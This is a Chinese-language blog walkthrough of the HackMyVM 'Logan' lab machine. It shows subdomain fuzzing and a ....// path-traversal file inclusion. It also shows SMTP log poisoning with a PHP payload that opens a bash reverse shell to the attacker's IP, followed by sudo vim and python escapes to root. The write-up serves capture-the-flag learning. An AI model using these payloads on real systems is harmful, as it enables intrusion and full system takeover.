<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Hackmyvm-Logan下载地址https:&#x2F;&#x2F;hackmyvm.eu&#x2F;machines&#x2F;machine.php?vm&#x3D;Logan 实验环境kali 10.0.2.8 Logan 10.0.2.32 信息收集端口探测开放了2和80端口  我们访问10.0.2.32  发现找不到网站，我们修改&#x2F;etc&#x2F;hosts从而使其访问成功 &#x2F;etc&#x2F;hosts修改">
<meta property="og:type" content="article">
<meta property="og:title" content="Hackmyvm-Logan">
<meta property="og:url" content="https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/">
<meta property="og:site_name" content="jxdgx">
<meta property="og:description" content="Hackmyvm-Logan下载地址https:&#x2F;&#x2F;hackmyvm.eu&#x2F;machines&#x2F;machine.php?vm&#x3D;Logan 实验环境kali 10.0.2.8 Logan 10.0.2.32 信息收集端口探测开放了2和80端口  我们访问10.0.2.32  发现找不到网站，我们修改&#x2F;etc&#x2F;hosts从而使其访问成功 &#x2F;etc&#x2F;hosts修改">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142448556-378727823.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142713940-84936707.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142829156-1302862402.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142856115-1784515162.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726152014762-1602273799.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726153142350-1879158282.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726153244100-1664487084.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726153329034-1043456102.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726201501867-1735300762.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726201936048-1654382103.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726202735687-1280566019.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726203520531-1765712000.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726204836073-1720300492.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726215824433-342113733.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220046348-915947527.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220439371-551079251.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220940524-1564662335.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220743942-1555767012.png">
<meta property="og:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726221246450-780750354.png">
<meta property="article:published_time" content="2023-04-02T13:34:31.000Z">
<meta property="article:modified_time" content="2026-04-24T13:49:32.581Z">
<meta property="article:author" content="jxdgx">
<meta property="article:tag" content="SMTP">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142448556-378727823.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/logo.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/logo.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
        
      
    
    <!-- title -->
    <title>Hackmyvm-Logan | jxdgx</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.1.0"></head>

<body class="max-width mx-auto px3 ltr is-post-page">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/links/">links</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2023/04/05/hackmyvm-gift/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/03/29/hackmyvm-Oliva/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&text=Hackmyvm-Logan"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&is_video=false&description=Hackmyvm-Logan"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hackmyvm-Logan&body=Check out this article: https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&name=Hackmyvm-Logan&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&t=Hackmyvm-Logan"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Hackmyvm-Logan"><span class="toc-number">1.</span> <span class="toc-text">Hackmyvm-Logan</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8B%E8%BD%BD%E5%9C%B0%E5%9D%80"><span class="toc-number">1.1.</span> <span class="toc-text">下载地址</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">实验环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.3.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.3.1.</span> <span class="toc-text">端口探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">1.3.2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95"><span class="toc-number">1.3.3.</span> <span class="toc-text">模糊测试</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">1.5.</span> <span class="toc-text">权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMTP%E7%9A%84%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.5.1.</span> <span class="toc-text">SMTP的实现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#25%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9D%A5%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.5.2.</span> <span class="toc-text">25端口的来连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E5%8F%96logan%E7%94%A8%E6%88%B7"><span class="toc-number">1.5.3.</span> <span class="toc-text">提取logan用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83root%E7%94%A8%E6%88%B7"><span class="toc-number">1.5.4.</span> <span class="toc-text">提权root用户</span></a></li></ol></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        
<div class="post-layout">
  <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
    <header>
      
    <h1 class="posttitle p-name" itemprop="name headline">
        Hackmyvm-Logan
    </h1>



      <div class="meta meta-post">
        
    <div class="postdate">
      
        <time datetime="2023-04-02T13:34:31.000Z" class="dt-published" itemprop="datePublished">2023-04-02</time>
        
      
    </div>


        
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/hackmyvm/">hackmyvm</a>
    </div>


        
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/SMTP/" rel="tag">SMTP</a>, <a class="p-category" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a>
    </div>


      </div>
    </header>
    

    <div class="content e-content" itemprop="articleBody">
      <h1 id="Hackmyvm-Logan"><a href="#Hackmyvm-Logan" class="headerlink" title="Hackmyvm-Logan"></a>Hackmyvm-Logan</h1><h2 id="下载地址"><a href="#下载地址" class="headerlink" title="下载地址"></a>下载地址</h2><p><a target="_blank" rel="noopener" href="https://hackmyvm.eu/machines/machine.php?vm=Logan">https://hackmyvm.eu/machines/machine.php?vm=Logan</a></p>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><p>kali 10.0.2.8</p>
<p>Logan 10.0.2.32</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="端口探测"><a href="#端口探测" class="headerlink" title="端口探测"></a>端口探测</h3><p>开放了2和80端口</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142448556-378727823.png" alt="image-20230726142442099"></p>
<p>我们访问10.0.2.32</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142713940-84936707.png" alt="image-20230726142709938"></p>
<p>发现找不到网站，我们修改&#x2F;etc&#x2F;hosts从而使其访问成功</p>
<p>&#x2F;etc&#x2F;hosts修改</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142829156-1302862402.png" alt="image-20230726142825208"></p>
<p>再次访问，访问成功</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726142856115-1784515162.png" alt="image-20230726142850847"></p>
<h3 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h3><p>发现没有啥可以用的</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726152014762-1602273799.png" alt="image-20230726152009711"></p>
<h3 id="模糊测试"><a href="#模糊测试" class="headerlink" title="模糊测试"></a>模糊测试</h3><p>我们进行子域名模糊测试</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ffuf -w subdomains-top1mil-20000.txt -u http://logan.hmv -H &quot;Host: FUZZ.logan.hmv&quot; -fw 5</span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726153142350-1879158282.png" alt="image-20230726153138712">我们在&#x2F;etc&#x2F;hosts中加入admin.logan.hmv</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726153244100-1664487084.png" alt="image-20230726153240418"></p>
<p>访问得到</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726153329034-1043456102.png" alt="image-20230726153325327"></p>
<h2 id="漏洞测试"><a href="#漏洞测试" class="headerlink" title="漏洞测试"></a>漏洞测试</h2><p>我们上传文件找不到可以上传的路径</p>
<p>我们在payments中访问抓包显示文件不存在</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726201501867-1735300762.png" alt="image-20230726201457590"></p>
<p>这个时候我们可以断定是由文件的，我们用目录穿越，有可能对..&#x2F;进行了过滤，我们可以对..&#x2F;改为….&#x2F;&#x2F;我们重新构造pyload为….&#x2F;&#x2F;….&#x2F;&#x2F;….&#x2F;&#x2F;….&#x2F;&#x2F;….&#x2F;&#x2F;etc&#x2F;passwd，我们发现抓到了&#x2F;etc&#x2F;passwd中的信息</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726201936048-1654382103.png" alt="image-20230726201930645"></p>
<p>我们从中可以看到在&#x2F;usr&#x2F;sbin&#x2F;nologin是不允许用ssh连接的</p>
<p>我们可以使用在端口探测的时候我们看到了25端口（这个是有smtp邮件协议的）</p>
<p>我们用smtp来实现权限提升</p>
<h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><h3 id="SMTP的实现"><a href="#SMTP的实现" class="headerlink" title="SMTP的实现"></a>SMTP的实现</h3><pre><code>                                +--------------+
                                |  Mail Client |
                                +------+-------+
                                       |
                                       |
                                       v
                               +-------+-------+
                               | SMTP Client 1 |
                               +-------+-------+
                                       |
                                       |
                                       v
                                 +-----+-----+
                                 | Mail Server|
                                 +-----+-----+
                                       |
                                       |
                                       v
                               +-------+-------+
                               | SMTP Server 1 |
                               +-------+-------+
                                       |
                                       |
                  +--------------------+--------------------+
                  |                                         |
                  v                                         v
           +------+------+                          +-------+------+
           |         |                          |              |
           v         v                          v              v
     +-----+-----+ +-----+-----+        +-----+-----+  +-----+-----+
     | SMTP     | | SMTP     |        | SMTP     |  | SMTP     |
     | Server 2 | | Server 3 |        | Server 4 |  | Server 5 |
     +----------+ +----------+        +----------+  +----------+
</code></pre>
<p>SMTP过程是通过电子邮件客户端的SMTP客户端将邮件发送给邮件服务器的SMTP服务器，然后SMTP服务器将邮件传递给目标SMTP服务器，并由目标邮件服务器存储和管理邮件，最终送达到目标用户的邮件箱中</p>
<h3 id="25端口的来连接"><a href="#25端口的来连接" class="headerlink" title="25端口的来连接"></a>25端口的来连接</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">EHLO kali.com这个命令是用来给SMTP服务器来建立连接的，并初始化</span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726202735687-1280566019.png" alt="image-20230726202729831"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">VRFY www-data@logan.hmv 这个是验证是否有这个邮箱地址</span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726203520531-1765712000.png" alt="image-20230726203515657"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">MAIL FROM: kali@nologin.com，设置发送人地址</span><br><span class="line">RCPT TO:  www-data@logan.hmv，设置收件人地址</span><br><span class="line">data</span><br><span class="line">&lt;?php exec(&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/10.0.2.8/6666 0&gt;&amp;1&#x27;&quot;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>这两个意思是设置后发给服务器后会有个响应，并在其中设置数据发送给<a href="mailto:&#119;&#x77;&#119;&#45;&#100;&#97;&#x74;&#x61;&#x40;&#108;&#x6f;&#x67;&#x61;&#x6e;&#x2e;&#x68;&#109;&#118;">www-data@logan.hmv</a>，</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726204836073-1720300492.png" alt="image-20230726204829460"></p>
<p>我们这个时候访问<a href="mailto:&#119;&#119;&#x77;&#45;&#x64;&#97;&#116;&#x61;&#64;&#108;&#x6f;&#103;&#97;&#110;&#46;&#104;&#109;&#118;">www-data@logan.hmv</a>会访问其中的数据，从而实现反弹shell</p>
<p>这个时候在&#x2F;var&#x2F;mail&#x2F;www-data中就会有数据</p>
<p>我们包含他就可以实现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://admin.logan.hmv/payments.php -d &#x27;file=....//....//....//....//....//var/mail/www-data&#x27;</span><br></pre></td></tr></table></figure>

<p>我们在kali上开启服务</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726215824433-342113733.png" alt="image-20230726215819701"></p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220046348-915947527.png" alt="image-20230726220042274"></p>
<p>我们可以看到logan中的vim有root权限</p>
<h3 id="提取logan用户"><a href="#提取logan用户" class="headerlink" title="提取logan用户"></a>提取logan用户</h3><p>我们用sudo -u logan vim打开文件，在输入！&#x2F;bin&#x2F;bash</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220439371-551079251.png" alt="image-20230726220433502"></p>
<p>我们使用python来实现交互</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 -c &#x27;import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220940524-1564662335.png" alt="image-20230726220936499"></p>
<h3 id="提权root用户"><a href="#提权root用户" class="headerlink" title="提权root用户"></a>提权root用户</h3><p>我们发现&#x2F;usr&#x2F;bin&#x2F;python3 &#x2F;opt&#x2F;learn_some_python.py有root权限</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726220743942-1555767012.png" alt="image-20230726220729090"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo -u root /usr/bin/python3 /opt/learn_some_python.py</span><br><span class="line">__import__(&#x27;os&#x27;).system(&#x27;/bin/bash&#x27;)</span><br></pre></td></tr></table></figure>

<p>我们输入命令实现root用户提权</p>
<p><img src="https://jxdgx.oss-cn-beijing.aliyuncs.com/test/2860184-20230726221246450-780750354.png" alt="image-20230726221242205"></p>

    </div>
  </article>
  
    <aside class="post-sidebar-toc">
      <div class="post-sidebar-toc-inner">
        <div class="post-sidebar-toc-title">Contents</div>
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Hackmyvm-Logan"><span class="toc-number">1.</span> <span class="toc-text">Hackmyvm-Logan</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8B%E8%BD%BD%E5%9C%B0%E5%9D%80"><span class="toc-number">1.1.</span> <span class="toc-text">下载地址</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">实验环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.3.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.3.1.</span> <span class="toc-text">端口探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">1.3.2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95"><span class="toc-number">1.3.3.</span> <span class="toc-text">模糊测试</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">1.5.</span> <span class="toc-text">权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMTP%E7%9A%84%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.5.1.</span> <span class="toc-text">SMTP的实现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#25%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9D%A5%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.5.2.</span> <span class="toc-text">25端口的来连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E5%8F%96logan%E7%94%A8%E6%88%B7"><span class="toc-number">1.5.3.</span> <span class="toc-text">提取logan用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83root%E7%94%A8%E6%88%B7"><span class="toc-number">1.5.4.</span> <span class="toc-text">提权root用户</span></a></li></ol></li></ol></li></ol>
      </div>
    </aside>
  
</div>




        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a href="/categories/">分类</a></li>
        
          <li><a href="/links/">links</a></li>
        
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    
    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Hackmyvm-Logan"><span class="toc-number">1.</span> <span class="toc-text">Hackmyvm-Logan</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%8B%E8%BD%BD%E5%9C%B0%E5%9D%80"><span class="toc-number">1.1.</span> <span class="toc-text">下载地址</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">实验环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.3.</span> <span class="toc-text">信息收集</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E6%8E%A2%E6%B5%8B"><span class="toc-number">1.3.1.</span> <span class="toc-text">端口探测</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">1.3.2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%A8%A1%E7%B3%8A%E6%B5%8B%E8%AF%95"><span class="toc-number">1.3.3.</span> <span class="toc-text">模糊测试</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%B5%8B%E8%AF%95"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞测试</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">1.5.</span> <span class="toc-text">权限提升</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#SMTP%E7%9A%84%E5%AE%9E%E7%8E%B0"><span class="toc-number">1.5.1.</span> <span class="toc-text">SMTP的实现</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#25%E7%AB%AF%E5%8F%A3%E7%9A%84%E6%9D%A5%E8%BF%9E%E6%8E%A5"><span class="toc-number">1.5.2.</span> <span class="toc-text">25端口的来连接</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E5%8F%96logan%E7%94%A8%E6%88%B7"><span class="toc-number">1.5.3.</span> <span class="toc-text">提取logan用户</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83root%E7%94%A8%E6%88%B7"><span class="toc-number">1.5.4.</span> <span class="toc-text">提权root用户</span></a></li></ol></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&text=Hackmyvm-Logan"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&is_video=false&description=Hackmyvm-Logan"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Hackmyvm-Logan&body=Check out this article: https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://dgxddd.github.io/2023/04/02/Hackmyvm-Logan/&title=Hackmyvm-Logan"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
